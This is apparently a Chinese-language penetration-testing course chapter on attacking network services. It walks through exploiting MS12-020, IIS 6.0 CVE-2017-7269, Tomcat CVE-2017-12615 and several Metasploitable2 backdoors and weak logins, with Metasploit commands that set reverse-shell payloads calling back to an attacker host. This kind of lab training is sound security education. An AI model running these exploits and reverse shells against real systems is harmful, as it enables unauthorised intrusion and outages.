第7章-7.1-网络服务渗透

网络服务渗透渗透测试基于Web应用系统的渗透虽然较为常见，但是除了常见的Web系统渗透测试外，还可以从网络服务进行渗透测试攻击。前言网络服务渗透攻击简介远程溢出蓝屏DoS攻击（CVE-2012-0002）IIS6.0远程代码执行（CVE-2017-7269）Tomcat任意文件上传（CVE-2017-12615）网络服务渗透是以远程主机运行的某个网络服务程序为目标，向该目标服务开放端口发送内嵌恶意内容并符合该网络服务协议的数据包，利用网络服务程序内部的安全漏洞，劫持目标程序控制流，实施远程执行代码等行为，最终达到控制目标系统的目的。网络服务渗透攻击是通过系统自带的网络服务、微软服务、第三方服务的漏洞进行渗透攻击。网络服务渗透以Windows系统平台为例，根据网络服务攻击面的类别来区分，可将网络服务渗透攻击分为以下三类。针对Windows系统自带网络服务的渗透攻击针对Windows系统上微软网络服务的渗透攻击针对Windows系统上第三方网络服务的渗透攻击网络服务渗透简介1.针对Windows系统自带网络服务的渗透攻击

在针对网络服务渗透攻击中，由于Windows系统的流行程度，使得Windows系统上运行的网络服务程序成了高危对象，尤其是那些Windows系统自带的默认安装、启用的网络服务，如SMB、RPC等。甚至有些服务对于特定服务器来说是必须开启的，如一个网站主机的IIS服务。其中的经典案例包括MS06-040、MS07-029、MS08-067、MS11-058、MS12-020等。网络服务渗透简介2.针对Windows系统上微软网络服务的渗透攻击

微软公司提供的网络服务产品常见的有IISInternet服务、数据库服务、Exchange电子邮件服务、MSDTC服务、DNS域名服务、WINS服务等。这些网络服务中存在着各种各样的安全漏洞，渗透测试中最常见的是针对IISInternet服务和数据库服务的攻击。IISInternet服务集成了HTTP、FTP、SMTP等诸多网络服务。IIS6.0之前的版本包含大量的安全漏洞，其类型包括信息泄露、目录遍历、缓冲区溢出等。在IIS6.0推出后，安全性有较大提升，但仍然有不少高等级的安全漏洞，如IPP服务整数溢出漏洞MS08-062、导致FTP服务远程代码执行漏洞MS09-053、IIS认证内存破坏漏洞MS10-040等。网络服务渗透简介3.针对Windows系统上第三方网络服务的渗透攻击

在操作系统中运行的非系统厂商提供的网络服务都可称之为第三方网络服务，与系统厂商提供的网络服务没有本质区别，比较常见的包括：提供HTTP服务的Apache、IBMWebSphere、Tomcat等；提供SQL数据库服务的Oracle、MySQL；以及提供FTP服务的Serv-U、FileZilla等。攻击者在尝试攻击默认系统服务未果之后，往往会通过扫描服务的默认端口，来探测用户系统是否使用一些常见的第三方服务，尝试利用这些服务的弱点渗透对方系统。网络服务渗透简介网络服务渗透攻击简介远程溢出蓝屏DoS攻击（CVE-2012-0002）IIS6.0远程代码执行（CVE-2017-7269）Tomcat任意文件上传（CVE-2017-12615）

2012年爆出的CVE-2012-0002漏洞，也就是我们常说的MS12-020漏洞

，该漏洞存在于RDP服务的底层驱动文件Rdpwd.sys中，属于内核级漏洞。攻击者经过向远程主机的3389端口发送恶意数据包，导致服务程序使用一个不存在的指针，致使远程主机崩溃，达到拒绝服务攻击的目的。受影响产品：

包括开启RDP的MicrosoftWindowsXPProfessional、MicrosoftWindowsXPHome、MicrosoftWindowsServer2003StandardEdition、MicrosoftWindowsServer2003EnterpriseEdition、MicrosoftWindowsServer2003DatacenterEdition、MicrosoftWindows7。远程溢出蓝屏DOS攻击（CVE-2012-0002）1.使用Nmap对目标进行操作系统探测sudonmap-O32发现是WindowsServer2003sp2，在CVE-2012-0002影响范围内远程溢出蓝屏DOS攻击（CVE-2012-0002）2.利用msf寻找对应漏洞利用模块，使用check脚本对目标进行检查，检查系统是否存在MS12-020漏洞。远程溢出蓝屏DOS攻击（CVE-2012-0002）3.使用漏洞利用脚本进行远程攻击```useauxiliary/dos/windows/rdp/ms12_020_maxchannelidssetrhosts32Run```远程溢出蓝屏DOS攻击（CVE-2012-0002）网络服务渗透攻击简介远程溢出蓝屏DoS攻击（CVE-2012-0002）IIS6.0远程代码执行（CVE-2017-7269）Tomcat任意文件上传（CVE-2017-12615）IISInternet服务是微软公司提供的网络服务产品常见的服务之一，IISInternet服务集成了HTTP、FTP、SMTP等诸多网络服务。IIS6.0之前的版本包含大量的安全漏洞，其类型包括信息泄露、目录遍历、缓冲区溢出等。IIS6.0默认不开启WebDAV，可是一旦开启了WebDAV支持，WebDAV服务中的ScStorgPathFromUrl函数存在缓冲区溢出漏洞，远程攻击者通过以“if:<http://"开头的长headerPROPFIND请求，执行任意代码，危害极大。受影响产品：MicrosoftWindowsServer2003R2开启WebDAV服务的IIS6.0IIS6.0远程代码执行（CVE-2017-7269）1.使用Nmap对目标进行详细服务探测nmap-sV32IIS6.0远程代码执行（CVE-2017-7269）2.下载exp。地址如下：gitclone/Al1ex/CVE-2017-72693.将exploit移动到攻击机中Metasploit的iis模块下面sudomvcve-2017-7269.rb/usr/share/metasploit-framework/modules/exploits/windows/iis/cve_2017_7269.rbIIS6.0远程代码执行（CVE-2017-7269）4.reload_all重新加载msf模块，然后搜索相应攻击模块IIS6.0远程代码执行（CVE-2017-7269）5.加载模块，开始攻击。命令如下：useexploit/windows/iis/cve_2017_7269setpayloadwindows/meterpreter/reverse_tcpsetrhost32setlhost31runIIS6.0远程代码执行（CVE-2017-7269）6.成功获取目标系统权限IIS6.0远程代码执行（CVE-2017-7269）网络服务渗透攻击简介远程溢出蓝屏DoS攻击（CVE-2012-0002）IIS6.0远程代码执行（CVE-2017-7269）Tomcat任意文件上传（CVE-2017-12615）

Tomcat服务器是一个免费的开放源代码的Web应用服务器，属于轻量级应用服务器，在中小型系统和并发访问用户不是很多的场合下被普遍使用，是开发和调试JSP程序的首选。2017年9月19日，ApacheTomcat官方确认一个高危漏洞CVE-2017-12615，在一定条件下，攻击者可以利用这个漏洞，获取用户服务器上JSP文件的源代码，或是通过精心构造的攻击请求，向用户服务器上传恶意JSP文件，通过上传的JSP文件，可在用户服务器上执行任意代码，从而导致数据泄露或获取服务器权限，存在高安全风险。受影响产品：ApacheTomcat7.0.0-7.0.79(windows环境)Tomcat任意文件上传（CVE-2017-12615）1.使用Nmap对目标进行详细服务探测nmap-sV32发现目标是Windows主机并且8080端口是Tomcat服务.Tomcat任意文件上传（CVE-2017-12615）Tomcat任意文件上传（CVE-2017-12615）2.使用dirb工具对web目录进行扫描，发现Tomcat后台目录为rootdirb32:8080/root/-wordlsit/usr/share/wordlists/dirb/big.txt3.使用whatweb对目标Tomcat进行信息搜集，发现是7.0.40版本，在CVE-2017-12615漏洞影响范围内whatweb32:8080/root/Tomcat任意文件上传（CVE-2017-12615）Tomcat任意文件上传（CVE-2017-12615）4.抓包上传一个内容为test的shell.jsp测试文件，服务器响应404错误Tomcat任意文件上传（CVE-2017-12615）5.在上传文件后加/，服务器响应201Created，成功上传Tomcat任意文件上传（CVE-2017-12615）6.上传简单的jsp木马，命令执行Metasploitable2虚拟系统是一个特别制作的ubuntu操作系统，本身设计作为安全工具测试和演示常见漏洞攻击，比上一个版本包含更多可利用的安全漏洞。这个版本的虚拟系统兼容VMware，VirtualBox和其他虚拟平台。默认开放账号：普通用户：msfadmin密码：msfadminMetasploitable2-Linux网络服务渗透实践使用metasploit对linux主机metasploitable-linux2进行信息收集。命令如下：nmap–sV90信息收集默认账号密码：msfadmin/msfadmin。命令如下：telnet90telnet弱口令登录默认mysql数据库root用户空密码。命令如下：mysql-h90-uroot-pMysql弱口令登录Postgres数据库默认账号口令：postgres/postgres。命令如下：psql-h90-UpostgresPostgresql弱密码登录vnc弱口令密码：password。命令如下：vncviewer90vnc弱口令登录TCP端口512,513和514为著名的rlogin提供服务。在系统中被错误配置从而允许远程访问者从任何地方访问。使用msfadmin账号进行登录。命令如下：rloginmsfadmin@90Rlogin错误配置漏洞Metasploitable2

在21端口上运行着vsftpd服务，一个使用广泛的FTP服务。这个特别的版本包含一个后门允许一个未知的入侵者进入核心代码。如果在发送的用户名后面加上”：）”（笑脸符号），这个版本的后门会在6200端口上打开一个监听的shell。Metasploit命令如下：useexploit/unix/ftp/vsftpd_234_backdoorsetrhost90exploitvsftpd后门某些镜像站点的UnrealIRcd，在DEBUG3_DOLOG_SYSTEM宏中外部引入的恶意代码，远程攻击者能够执行任意代码。在Metasploitable2

的6667端口上运行着UnreaIRCD

IRC的守护进程。通过在一个系统命令后面添加两个字母”AB“发送给被攻击服务器任意一个监听该端口来触发。Metasploit命令如下：useexploit/unix/irc/unreal_ircd_3281_backdoorsetpayloadcmd/unix/reverse_perlsetrhost90setlhost31exploitUnrealRCDIRC漏洞Samba的sambd默认配置在可写文件共享时，存在目录遍历漏洞，远程用户可以通过smbclient端使用一个对称命，创建一个包含..的目录遍历符的软连接，可以进行目录遍历以及访问任意文件。Metasploit命令如下：useauxiliary/admin/smb/samba_symlink_traversalsetrhosts90setsmbsharetmpexploitSamba默认配置目录遍历漏洞攻击成功后，利用smbclient进行连接，无需root密码即可访问资源。命令如下：smbclient//90/tmpSamba默认配置目录遍历漏洞Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。如果在调用smb.conf中定义的外部脚本时，通过对/bin/sh的MS-RPC调用提交了恶意输入的话，就可能允许攻击者以nobody用户的权限执行任意命令。Metasploit命令如下：useexploit/multi/samba/usermap_scriptsetrhosts90exploitSambaMS-RPCShell命令注入漏洞程序监听在1524端口，连接到1524端口就可以直接获得root权限。命令如下：telnet901524Ingreslock后门JavaRMIServer的RMI注册表和RMI激活服务的默认配置存在安全漏洞，可被利用导致代码执行,服务运行端口1099。Metasploit命令如下：useexploit/multi/misc/java_rmi_serversetrhosts90exploit攻击成功后，会建立一个session，使用sessions